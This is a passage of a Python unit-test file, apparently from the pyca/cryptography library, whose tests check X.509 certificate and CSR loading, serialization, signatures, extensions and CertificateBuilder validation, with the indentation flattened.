assert hash(cert1) == hash(cert2)
assert hash(cert1) != hash(cert3)
def test_version_1_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "v1_cert.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.version is x509.Version.v1
def test_invalid_pem(self, backend):
with pytest.raises(ValueError):
x509.load_pem_x509_certificate(b"notacert", backend)
def test_invalid_der(self, backend):
with pytest.raises(ValueError):
x509.load_der_x509_certificate(b"notacert", backend)
def test_unsupported_signature_hash_algorithm_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "verisign_md2_root.pem"),
x509.load_pem_x509_certificate,
backend
)
with pytest.raises(UnsupportedAlgorithm):
cert.signature_hash_algorithm
def test_public_bytes_pem(self, backend):
# Load an existing certificate.
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
# Encode it to PEM and load it back.
cert = x509.load_pem_x509_certificate(cert.public_bytes(
encoding=serialization.Encoding.PEM,
), backend)
# We should recover what we had to start with.
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.serial_number == 2
public_key = cert.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
assert cert.version is x509.Version.v3
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
def test_public_bytes_der(self, backend):
# Load an existing certificate.
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
# Encode it to DER and load it back.
cert = x509.load_der_x509_certificate(cert.public_bytes(
encoding=serialization.Encoding.DER,
), backend)
# We should recover what we had to start with.
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.serial_number == 2
public_key = cert.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
assert cert.version is x509.Version.v3
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
def test_public_bytes_invalid_encoding(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
with pytest.raises(TypeError):
cert.public_bytes('NotAnEncoding')
@pytest.mark.parametrize(
("cert_path", "loader_func", "encoding"),
[
(
os.path.join("x509", "v1_cert.pem"),
x509.load_pem_x509_certificate,
serialization.Encoding.PEM,
),
(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
serialization.Encoding.DER,
),
]
)
def test_public_bytes_match(self, cert_path, loader_func, encoding,
backend):
cert_bytes = load_vectors_from_file(
cert_path, lambda pemfile: pemfile.read(), mode="rb"
)
cert = loader_func(cert_bytes, backend)
serialized = cert.public_bytes(encoding)
assert serialized == cert_bytes
def test_certificate_repr(self, backend):
cert = _load_cert(
os.path.join(
"x509", "cryptography.io.pem"
),
x509.load_pem_x509_certificate,
backend
)
assert repr(cert) == (
"<Certificate(subject=<Name(OU=GT48742965,OU=See www.rapidssl.com"
"/resources/cps (c)14,OU=Domain Control Validated - RapidSSL(R),"
"CN=www.cryptography.io)>, ...)>"
)
def test_parse_tls_feature_extension(self, backend):
cert = _load_cert(
os.path.join("x509", "tls-feature-ocsp-staple.pem"),
x509.load_pem_x509_certificate,
backend
)
ext = cert.extensions.get_extension_for_class(x509.TLSFeature)
assert ext.critical is False
assert ext.value == x509.TLSFeature(
[x509.TLSFeatureType.status_request]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSACertificateRequest(object):
@pytest.mark.parametrize(
("path", "loader_func"),
[
[
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr
],
[
os.path.join("x509", "requests", "rsa_sha1.der"),
x509.load_der_x509_csr
],
]
)
def test_load_rsa_certificate_request(self, path, loader_func, backend):
request = _load_cert(path, loader_func, backend)
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
assert (
request.signature_algorithm_oid ==
SignatureAlgorithmOID.RSA_WITH_SHA1
)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
]
extensions = request.extensions
assert isinstance(extensions, x509.Extensions)
assert list(extensions) == []
@pytest.mark.parametrize(
"loader_func",
[x509.load_pem_x509_csr, x509.load_der_x509_csr]
)
def test_invalid_certificate_request(self, loader_func, backend):
with pytest.raises(ValueError):
loader_func(b"notacsr", backend)
def test_unsupported_signature_hash_algorithm_request(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_md4.pem"),
x509.load_pem_x509_csr,
backend
)
with pytest.raises(UnsupportedAlgorithm):
request.signature_hash_algorithm
def test_duplicate_extension(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "two_basic_constraints.pem"
),
x509.load_pem_x509_csr,
backend
)
with pytest.raises(x509.DuplicateExtension) as exc:
request.extensions
assert exc.value.oid == ExtensionOID.BASIC_CONSTRAINTS
def test_unsupported_critical_extension(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "unsupported_extension_critical.pem"
),
x509.load_pem_x509_csr,
backend
)
ext = request.extensions.get_extension_for_oid(
x509.ObjectIdentifier('1.2.3.4')
)
assert ext.value.value == b"value"
def test_unsupported_extension(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "unsupported_extension.pem"
),
x509.load_pem_x509_csr,
backend
)
extensions = request.extensions
assert len(extensions) == 1
assert extensions[0].oid == x509.ObjectIdentifier("1.2.3.4")
assert extensions[0].value == x509.UnrecognizedExtension(
x509.ObjectIdentifier("1.2.3.4"), b"value"
)
def test_request_basic_constraints(self, backend):
request = _load_cert(
os.path.join(
"x509", "requests", "basic_constraints.pem"
),
x509.load_pem_x509_csr,
backend
)
extensions = request.extensions
assert isinstance(extensions, x509.Extensions)
assert list(extensions) == [
x509.Extension(
ExtensionOID.BASIC_CONSTRAINTS,
True,
x509.BasicConstraints(ca=True, path_length=1),
),
]
def test_subject_alt_name(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "san_rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend,
)
ext = request.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(ext.value) == [
x509.DNSName(u"cryptography.io"),
x509.DNSName(u"sub.cryptography.io"),
]
def test_public_bytes_pem(self, backend):
# Load an existing CSR.
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
# Encode it to PEM and load it back.
request = x509.load_pem_x509_csr(request.public_bytes(
encoding=serialization.Encoding.PEM,
), backend)
# We should recover what we had to start with.
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
]
def test_public_bytes_der(self, backend):
# Load an existing CSR.
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
# Encode it to DER and load it back.
request = x509.load_der_x509_csr(request.public_bytes(
encoding=serialization.Encoding.DER,
), backend)
# We should recover what we had to start with.
assert isinstance(request.signature_hash_algorithm, hashes.SHA1)
public_key = request.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
subject = request.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
]
def test_signature(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.signature == binascii.unhexlify(
b"8364c86ffbbfe0bfc9a21f831256658ca8989741b80576d36f08a934603a43b1"
b"837246d00167a518abb1de7b51a1e5b7ebea14944800818b1a923c804f120a0d"
b"624f6310ef79e8612755c2b01dcc7f59dfdbce0db3f2630f185f504b8c17af80"
b"cbd364fa5fda68337153930948226cd4638287a0aed6524d3006885c19028a1e"
b"e2f5a91d6e77dbaa0b49996ee0a0c60b55b61bd080a08bb34aa7f3e07e91f37f"
b"6a11645be2d8654c1570dcda145ed7cc92017f7d53225d7f283f3459ec5bda41"
b"cf6dd75d43676c543483385226b7e4fa29c8739f1b0eaf199613593991979862"
b"e36181e8c4c270c354b7f52c128db1b70639823324c7ea24791b7bc3d7005f3b"
)
def test_tbs_certrequest_bytes(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.tbs_certrequest_bytes == binascii.unhexlify(
b"308201840201003057310b3009060355040613025553310e300c060355040813"
b"055465786173310f300d0603550407130641757374696e310d300b060355040a"
b"130450794341311830160603550403130f63727970746f6772617068792e696f"
b"30820122300d06092a864886f70d01010105000382010f003082010a02820101"
b"00a840a78460cb861066dfa3045a94ba6cf1b7ab9d24c761cffddcc2cb5e3f1d"
b"c3e4be253e7039ef14fe9d6d2304f50d9f2e1584c51530ab75086f357138bff7"
b"b854d067d1d5f384f1f2f2c39cc3b15415e2638554ef8402648ae3ef08336f22"
b"b7ecc6d4331c2b21c3091a7f7a9518180754a646640b60419e4cc6f5c798110a"
b"7f030a639fe87e33b4776dfcd993940ec776ab57a181ad8598857976dc303f9a"
b"573ca619ab3fe596328e92806b828683edc17cc256b41948a2bfa8d047d2158d"
b"3d8e069aa05fa85b3272abb1c4b4422b6366f3b70e642377b145cd6259e5d3e7"
b"db048d51921e50766a37b1b130ee6b11f507d20a834001e8de16a92c14f2e964"
b"a30203010001a000"
)
request.public_key().verify(
request.signature,
request.tbs_certrequest_bytes,
padding.PKCS1v15(),
request.signature_hash_algorithm
)
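# tbs_certrequest_bytes is the DER-encoded certificationRequestInfo, i.e. the
# exact bytes the CSR signature is computed over, so verifying
# request.signature against it with the embedded public key shows the request
# is self-consistent.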
def test_public_bytes_invalid_encoding(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
with pytest.raises(TypeError):
request.public_bytes('NotAnEncoding')
def test_signature_invalid(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "invalid_signature.pem"),
x509.load_pem_x509_csr,
backend
)
assert not request.is_signature_valid
def test_signature_valid(self, backend):
request = _load_cert(
os.path.join("x509", "requests", "rsa_sha256.pem"),
x509.load_pem_x509_csr,
backend
)
assert request.is_signature_valid
@pytest.mark.parametrize(
("request_path", "loader_func", "encoding"),
[
(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
serialization.Encoding.PEM,
),
(
os.path.join("x509", "requests", "rsa_sha1.der"),
x509.load_der_x509_csr,
serialization.Encoding.DER,
),
]
)
def test_public_bytes_match(self, request_path, loader_func, encoding,
backend):
request_bytes = load_vectors_from_file(
request_path, lambda pemfile: pemfile.read(), mode="rb"
)
request = loader_func(request_bytes, backend)
serialized = request.public_bytes(encoding)
assert serialized == request_bytes
def test_eq(self, backend):
request1 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request2 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request1 == request2
def test_ne(self, backend):
request1 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request2 = _load_cert(
os.path.join("x509", "requests", "san_rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert request1 != request2
assert request1 != object()
def test_hash(self, backend):
request1 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request2 = _load_cert(
os.path.join("x509", "requests", "rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
request3 = _load_cert(
os.path.join("x509", "requests", "san_rsa_sha1.pem"),
x509.load_pem_x509_csr,
backend
)
assert hash(request1) == hash(request2)
assert hash(request1) != hash(request3)
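# Two independently loaded copies of the same CSR compare and hash equal,
# while a CSR with different contents does not.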
def test_build_cert(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'PyCA'),
x509.NameAttribute(NameOID.COMMON_NAME, u'cryptography.io'),
])).public_key(
subject_private_key.public_key()
).add_extension(
x509.BasicConstraints(ca=False, path_length=None), True,
).add_extension(
x509.SubjectAlternativeName([x509.DNSName(u"cryptography.io")]),
critical=False,
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA1(), backend)
assert cert.version is x509.Version.v3
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
basic_constraints = cert.extensions.get_extension_for_oid(
ExtensionOID.BASIC_CONSTRAINTS
)
assert basic_constraints.value.ca is False
assert basic_constraints.value.path_length is None
subject_alternative_name = cert.extensions.get_extension_for_oid(
ExtensionOID.SUBJECT_ALTERNATIVE_NAME
)
assert list(subject_alternative_name.value) == [
x509.DNSName(u"cryptography.io"),
]
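# A CertificateBuilder must be given serial_number, issuer_name, subject_name,
# public_key, not_valid_before and not_valid_after before sign(); extensions
# are optional and carried through to the issued certificate. A minimal
# self-signed sketch (not part of the test suite, assumes a freshly generated
# key) looks like:
#
#   key = rsa.generate_private_key(
#       public_exponent=65537, key_size=2048, backend=backend
#   )
#   name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, u"example")])
#   cert = x509.CertificateBuilder().subject_name(name).issuer_name(
#       name
#   ).public_key(key.public_key()).serial_number(
#       x509.random_serial_number()
#   ).not_valid_before(
#       datetime.datetime.utcnow()
#   ).not_valid_after(
#       datetime.datetime.utcnow() + datetime.timedelta(days=1)
#   ).sign(key, hashes.SHA256(), backend)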
def test_build_cert_private_type_encoding(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
name = x509.Name([
x509.NameAttribute(
NameOID.STATE_OR_PROVINCE_NAME, u'Texas',
_ASN1Type.PrintableString),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(
NameOID.COMMON_NAME, u'cryptography.io', _ASN1Type.IA5String),
])
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(
name
).subject_name(
name
).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(not_valid_after)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
for dn in (cert.subject, cert.issuer):
assert dn.get_attributes_for_oid(
NameOID.STATE_OR_PROVINCE_NAME
)[0]._type == _ASN1Type.PrintableString
assert dn.get_attributes_for_oid(
NameOID.COMMON_NAME
)[0]._type == _ASN1Type.IA5String
assert dn.get_attributes_for_oid(
NameOID.LOCALITY_NAME
)[0]._type == _ASN1Type.UTF8String
def test_build_cert_printable_string_country_name(self, backend):
issuer_private_key = RSA_KEY_2048.private_key(backend)
subject_private_key = RSA_KEY_2048.private_key(backend)
not_valid_before = datetime.datetime(2002, 1, 1, 12, 1)
not_valid_after = datetime.datetime(2030, 12, 31, 8, 30)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(issuer_private_key, hashes.SHA256(), backend)
parsed = _parse_cert(cert.public_bytes(serialization.Encoding.DER))
subject = parsed.subject
issuer = parsed.issuer
def read_next_rdn_value_tag(reader):
# Assume each RDN has a single attribute.
with reader.read_element(SET) as rdn:
attribute = rdn.read_element(SEQUENCE)
with attribute:
_ = attribute.read_element(OBJECT_IDENTIFIER)
tag, value = attribute.read_any_element()
return tag
# Check that each value was encoded as an ASN.1 PRINTABLESTRING.
assert read_next_rdn_value_tag(subject) == PRINTABLE_STRING
assert read_next_rdn_value_tag(issuer) == PRINTABLE_STRING
if (
# This only works correctly in OpenSSL 1.1.0f+ and 1.0.2l+
backend._lib.CRYPTOGRAPHY_OPENSSL_110F_OR_GREATER or (
backend._lib.CRYPTOGRAPHY_OPENSSL_102L_OR_GREATER and
not backend._lib.CRYPTOGRAPHY_OPENSSL_110_OR_GREATER
)
):
assert read_next_rdn_value_tag(subject) == PRINTABLE_STRING
assert read_next_rdn_value_tag(issuer) == PRINTABLE_STRING
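# RFC 5280 requires countryName values to be encoded as PrintableString rather
# than the UTF8String default; the DER-level check above confirms both the
# country name and jurisdiction country name attributes get that encoding.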
class TestCertificateBuilder(object):
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_checks_for_unsupported_extensions(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
datetime.datetime(1999, 1, 1)
).not_valid_after(
datetime.datetime(2020, 1, 1)
).add_extension(
DummyExtension(), False
)
with pytest.raises(NotImplementedError):
builder.sign(private_key, hashes.SHA1(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_encode_nonstandard_aia(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
aia = x509.AuthorityInformationAccess([
x509.AccessDescription(
x509.ObjectIdentifier("2.999.7"),
x509.UniformResourceIdentifier(u"http://example.com")
),
])
builder = x509.CertificateBuilder().subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
datetime.datetime(1999, 1, 1)
).not_valid_after(
datetime.datetime(2020, 1, 1)
).add_extension(
aia, False
)
builder.sign(private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_subject_dn_asn1_types(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
name = x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"mysite.com"),
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"value"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"value"),
x509.NameAttribute(NameOID.STREET_ADDRESS, u"value"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"value"),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u"value"),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u"value"),
x509.NameAttribute(NameOID.SURNAME, u"value"),
x509.NameAttribute(NameOID.GIVEN_NAME, u"value"),
x509.NameAttribute(NameOID.TITLE, u"value"),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.X500_UNIQUE_IDENTIFIER, u"value"),
x509.NameAttribute(NameOID.DN_QUALIFIER, u"value"),
x509.NameAttribute(NameOID.PSEUDONYM, u"value"),
x509.NameAttribute(NameOID.USER_ID, u"value"),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u"value"),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.JURISDICTION_COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.JURISDICTION_LOCALITY_NAME, u"value"),
x509.NameAttribute(
NameOID.JURISDICTION_STATE_OR_PROVINCE_NAME, u"value"
),
x509.NameAttribute(NameOID.BUSINESS_CATEGORY, u"value"),
x509.NameAttribute(NameOID.POSTAL_ADDRESS, u"value"),
x509.NameAttribute(NameOID.POSTAL_CODE, u"value"),
])
cert = x509.CertificateBuilder().subject_name(
name
).issuer_name(
name
).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
datetime.datetime(1999, 1, 1)
).not_valid_after(
datetime.datetime(2020, 1, 1)
).sign(private_key, hashes.SHA256(), backend)
for dn in (cert.subject, cert.issuer):
for oid, asn1_type in TestNameAttribute.EXPECTED_TYPES:
assert dn.get_attributes_for_oid(
oid
)[0]._type == asn1_type
@pytest.mark.parametrize(
("not_valid_before", "not_valid_after"),
[
[datetime.datetime(1970, 2, 1), datetime.datetime(9999, 1, 1)],
[datetime.datetime(1970, 2, 1), datetime.datetime(9999, 12, 31)],
]
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_extreme_times(self, not_valid_before, not_valid_after, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
private_key.public_key()
).serial_number(
777
).not_valid_before(
not_valid_before
).not_valid_after(
not_valid_after
)
cert = builder.sign(private_key, hashes.SHA256(), backend)
assert cert.not_valid_before == not_valid_before
assert cert.not_valid_after == not_valid_after
parsed = _parse_cert(cert.public_bytes(serialization.Encoding.DER))
assert parsed.not_before_tag == UTC_TIME
assert parsed.not_after_tag == GENERALIZED_TIME
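# Per RFC 5280, validity dates up to and including 2049 are encoded as UTCTime
# and dates from 2050 onward as GeneralizedTime; the parametrized dates above
# exercise both branches.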
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_subject_name(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_issuer_name(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_public_key(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_not_valid_before(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_not_valid_after(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().serial_number(
777
).issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_no_serial_number(self, backend):
subject_private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder().issuer_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).subject_name(x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])).public_key(
subject_private_key.public_key()
).not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
).not_valid_after(
datetime.datetime(2030, 12, 31, 8, 30)
)
with pytest.raises(ValueError):
builder.sign(subject_private_key, hashes.SHA256(), backend)
def test_issuer_name_must_be_a_name_type(self):
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.issuer_name("subject")
with pytest.raises(TypeError):
builder.issuer_name(object)
def test_issuer_name_may_only_be_set_once(self):
name = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
builder = x509.CertificateBuilder().issuer_name(name)
with pytest.raises(ValueError):
builder.issuer_name(name)
def test_subject_name_must_be_a_name_type(self):
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.subject_name("subject")
with pytest.raises(TypeError):
builder.subject_name(object)
def test_subject_name_may_only_be_set_once(self):
name = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
])
builder = x509.CertificateBuilder().subject_name(name)
with pytest.raises(ValueError):
builder.subject_name(name)
def test_not_valid_before_after_not_valid_after(self):
builder = x509.CertificateBuilder()
builder = builder.not_valid_after(
datetime.datetime(2002, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.not_valid_before(
datetime.datetime(2003, 1, 1, 12, 1)
)
def test_not_valid_after_before_not_valid_before(self):
builder = x509.CertificateBuilder()
builder = builder.not_valid_before(
datetime.datetime(2002, 1, 1, 12, 1)
)
with pytest.raises(ValueError):
builder.not_valid_after(
datetime.datetime(2001, 1, 1, 12, 1)
)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_public_key_must_be_public_key(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
builder = x509.CertificateBuilder()
with pytest.raises(TypeError):
builder.public_key(private_key)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
def test_public_key_may_only_be_set_once(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
public_key = private_key.public_key()
builder = x509.CertificateBuilder().public_key(public_key)
with pytest.raises(ValueError):
builder.public_key(public_key)
def test_serial_number_must_be_an_integer_type(self):
with pytest.raises(TypeError):
